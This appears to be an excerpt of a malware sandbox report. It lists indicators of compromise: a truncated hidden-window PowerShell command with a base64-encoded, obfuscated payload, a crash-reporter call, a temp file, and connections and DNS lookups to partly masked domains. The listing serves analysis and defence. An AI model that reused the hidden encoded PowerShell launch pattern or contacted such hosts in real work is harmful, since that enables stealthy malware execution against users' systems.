Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -enco JABZAGEAZgBmAHUAawBuAGIAZwBlAD0AJwBVAHQAbQBuAHUAeQByAHYAeQAnADsAJABLAGUAaABvAGwAbwBlAG4AdQBzAGIAIAA9ACAAJwA2ADIAOQAnADsAJABaAHYAZwBuAGsAZwB4AHEAdwBzAGcAPQAnAE4...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1468
- %TEMP%\1387644.cvr
- 'ma#####monkeymedia.com':80
- 'me###tzaki.com':443
- 'pk#.goog':80
- http://pk#.goog/gsr1/gsr1.crt
- 'me###tzaki.com':443
- DNS ASK ma#####monkeymedia.com
- DNS ASK mo###.##st.zinimedia.com
- DNS ASK la###opper.com
- DNS ASK bo##fy.com
- DNS ASK me###tzaki.com
- DNS ASK pk#.goog